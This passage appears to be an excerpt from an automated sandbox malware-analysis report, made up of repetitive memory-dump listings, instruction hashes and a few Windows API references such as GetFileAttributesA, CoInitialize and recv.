                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: f27c57e388f6805d35f1df8bb49f9c475d56a14a7f59129968f71b8c591894c8
                                                                                                                                                                                                                                                                • Instruction ID: 38a916bc450e0cb0cc78080210f9ceae003fcfad0c9cc356c6e12897bf67edd7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f27c57e388f6805d35f1df8bb49f9c475d56a14a7f59129968f71b8c591894c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6C08C2801160089FD1C053C14D98E93345E95F7A73F41BD6E878EB1E1DA35580F9210
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,0085DA1D,?,?,?,?), ref: 008587B9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: d982b74472e2eb62a94a8a28eeb0b8e963212e414181b50c78d5d7b04d952fe8
                                                                                                                                                                                                                                                                • Instruction ID: 1cf2d89e9275b17eb559dea00421ed09309f30f9c7ae05b3e226979b6e7b4441
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d982b74472e2eb62a94a8a28eeb0b8e963212e414181b50c78d5d7b04d952fe8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDC08034011200C5F51C453C54984753705F91B7173F00B99D835EB1E1DB32C40BC650
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0085B3C8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                • Opcode ID: d16b4ea85d4af734e5d32b5eabd82bc1693042cca0b4919ab9c08a4074457605
                                                                                                                                                                                                                                                                • Instruction ID: 8bbb1f4534462b83cd071052d86591aa67ddca73d3dbb93f17065cb58cfc317c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d16b4ea85d4af734e5d32b5eabd82bc1693042cca0b4919ab9c08a4074457605
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25B10670A10268DFEB28CF18C994BDEB7B5FF15304F5045D9E80AA7281D775AA88CF91
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1761836547.0000000005120000.00000040.00001000.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5120000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c9edb66a9ac443275420cdef4a27d5109d934b68c9c7dd25161a216349856282
                                                                                                                                                                                                                                                                • Instruction ID: d0c0510581212ea177789e6d06b7b1eb90dcfb61592ee59bc7394e65db54c823
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9edb66a9ac443275420cdef4a27d5109d934b68c9c7dd25161a216349856282
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF05C62A849305F81007A5A1F9C3FB7BA5BEAE2113704330E4C78B103D7554A579E91
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1761836547.0000000005120000.00000040.00001000.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5120000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 0dde0c43da40ddd87d2b4c242f9f945ef20129f5057045874c8de12c15489855
                                                                                                                                                                                                                                                                • Instruction ID: 6815a1e51d83f1a1054b952b684e417cf97f984143885734dcac8f7d217b4b1b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dde0c43da40ddd87d2b4c242f9f945ef20129f5057045874c8de12c15489855
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEE020A65888704FC34072A65F9D3EEBB556E9B3313244371E497571939B840616ED81
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1761836547.0000000005120000.00000040.00001000.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5120000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 2cac7db07d1682fa0f3b364776a9e95a7a0f9a3d599ed00ef40be25f8b531528
                                                                                                                                                                                                                                                                • Instruction ID: 4bc7a50974ac1479593522a7227a7c469ede4b85fc8d328d02a4913ab9eab807
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cac7db07d1682fa0f3b364776a9e95a7a0f9a3d599ed00ef40be25f8b531528
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0E026A398C1316E8042B65A1F9C2FE7B6AB80B3313314271F0C297502F7C00614A952
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                • Opcode ID: a3ae3c15aba680b05f7cff7a6bb1759a3c3900f10ea2fa21b864e6873e2a5125
                                                                                                                                                                                                                                                                • Instruction ID: 7d789344a11c4ed3a039eaab5161eaae47ebf609d5ad5aec2639c814a90bdca7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3ae3c15aba680b05f7cff7a6bb1759a3c3900f10ea2fa21b864e6873e2a5125
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29C22A71E046288FDF25EE68DD40BAAB7B5FB48305F1841EAD84DE7240E775AE818F41
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 0085E10B
                                                                                                                                                                                                                                                                • recv.WS2_32(?,?,00000008,00000000), ref: 0085E140
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
